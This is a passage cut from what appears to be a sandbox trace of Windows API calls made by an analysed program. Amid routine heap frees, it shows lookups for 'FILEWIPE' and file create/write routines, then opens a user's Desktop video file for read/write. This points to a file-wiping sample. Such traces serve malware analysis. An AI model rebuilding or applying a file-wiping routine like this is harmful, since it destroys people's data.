hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.234] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.234] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flv")) returned 0x20 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0x90af58 [0161.237] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.237] CharLowerBuffW (in: lpsz="byte[93330]", cchLength=0xb | out: lpsz="byte[93330]") returned 0xb [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.239] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.240] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.240] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0161.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.241] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.242] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.242] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.242] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.243] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.243] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0161.244] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.244] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.244] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.244] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.244] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.244] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.244] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.245] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.245] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.245] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.246] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, 